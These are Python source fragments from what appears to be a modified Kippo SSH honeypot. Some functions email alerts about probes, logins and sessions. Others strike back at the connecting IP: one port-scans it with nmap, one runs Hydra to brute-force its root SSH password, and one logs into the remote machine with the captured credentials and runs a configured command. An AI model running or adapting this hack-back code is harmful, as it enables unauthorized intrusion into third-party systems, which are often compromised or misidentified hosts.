def loginThread(self): client = SSHClient() client.set_missing_host_key_policy(AutoAddPolicy()) loginDetailString = self.username + "@" + self.clientip +" (" + self.password + ")" print "Attempting login with", loginDetailString try: client.connect(hostname=self.clientip, username=self.username, password=self.password) except: print "Authentication failed for", loginDetailString return sendEmail('New login success!', "Successfully logged in to remote box: " + loginDetailString) configName = "not_root_command" if (self.username == "root"): configName = "root_command" command = config().get('dirtybastard', configName)[1:-1] # Remove quotes print "SUCCESS! Running command: " + command stdin, stdout, stderr = client.exec_command(command) print "stdout:" stdoutString = "" for line in stdout.readlines(): print line.strip() stdoutString = stdoutString + line.strip() + "\n" sendEmail('Output from command', "stdout:\n" + stdoutString);
def checkUserPass(self, username, password): cfg = config() if UserDB().checklogin(username, password): print 'login attempt [%s/%s] succeeded' % (username, password) if cfg.has_option('smtp', 'alert_login'): if cfg.get('smtp', 'alert_login') == 'true': print 'Emailing about login notification (alert_login = true).' emailMessage = 'There was a succesfully login (%s/%s).' % (username, password) sendEmail('SSH Succesful Login', emailMessage) return True else: print 'login attempt [%s/%s] failed' % (username, password) return False
def connectionLost(self, reason): cfg = config() for i in self.interactors: i.sessionClosed() if self.transport.sessionno in self.factory.sessions: del self.factory.sessions[self.transport.sessionno] self.lastlogExit() if self.ttylog_open: ttylog.ttylog_close(self.ttylog_file, time.time()) self.ttylog_open = False if cfg.has_option('smtp', 'alert_quit'): if cfg.get('smtp', 'alert_quit') == 'true': print 'Emailing about attack being over (alert_quit = true).' emailMessage = 'The attacker quit.\n\nPlease check the logs (%s)!' % (self.ttylog_file) sendEmail('SSH Attack Finished', emailMessage) transport.SSHServerTransport.connectionLost(self, reason)
def connectionMade(self): cfg = config() print 'New connection: %s:%s (%s:%s) [session: %d]' % \ (self.transport.getPeer().host, self.transport.getPeer().port, self.transport.getHost().host, self.transport.getHost().port, self.transport.sessionno) self.interactors = [] self.logintime = time.time() self.ttylog_open = False if cfg.has_option('smtp', 'alert_probe'): if cfg.get('smtp', 'alert_probe') == 'true': print 'Emailing about SSH probe (alert_probe = true).' emailMessage = 'There was an SSH probe request.\nFrom: %s:%s.\nTo: %s:%s.\nKippo Session: %s.' % \ (self.transport.getPeer().host, self.transport.getPeer().port, self.transport.getHost().host, self.transport.getHost().port, self.transport.sessionno) sendEmail('SSH Probe', emailMessage) transport.SSHServerTransport.connectionMade(self)
def scanThread(self): nm = nmap.PortScanner() nmapArgs = config().get("dirtybastard", "nmap_args")[1:-1] # Remove quotes print "Running portscan at %s with arguments: %s" % (self.clientip, nmapArgs) try: r = nm.scan(self.clientip, arguments=nmapArgs) except nmap.PortScannerError: print "!!! PortScan error. Did you request a scan type that requires root?" return openTcpPorts = [] openUdpPorts = [] try: for port in nm[self.clientip]["tcp"].keys(): openTcpPorts.append(port) except KeyError: pass try: for port in nm[self.clientip]["udp"].keys(): openUdpPorts.append(port) except KeyError: pass resultsString = "" for port in openTcpPorts: resultsString += "TCP Port open: %s\n" % (port) portInfo = nm[self.clientip]["tcp"][port] for key in portInfo: resultsString += "\t - %s: %s\n" % (key, portInfo[key]) for port in openUdpPorts: resultsString += "UDP Port open: %s\n" % (port) portInfo = nm[self.clientip]["udp"][port] for key in portInfo: resultsString += "\t - %s: %s\n" % (key, portInfo[key]) print resultsString sendEmail("Port scan results " + self.clientip, resultsString)
def bruteforceThread(self): print "Launching Hydra at %s." % (self.clientip) cfg = config() hydraLocation = cfg.get('dirtybastard', 'hydra_location') listLocation = cfg.get('dirtybastard', 'password_list') if not self.validFiles(hydraLocation, listLocation): return cmd = [hydraLocation, self.clientip, "ssh", "-l", "root", "-P" , listLocation] p = subprocess.Popen(cmd, stdout=subprocess.PIPE) out, err = p.communicate() print "Hydra complete (%s)." % (self.clientip) print "stdout:", out sendEmail('Hydra results ' + self.clientip, out)
def loginSuccess(self, username, password): logLine = 'login attempt [%s/%s] succeeded' % (username, password) print logLine sendEmail('New attacker', logLine)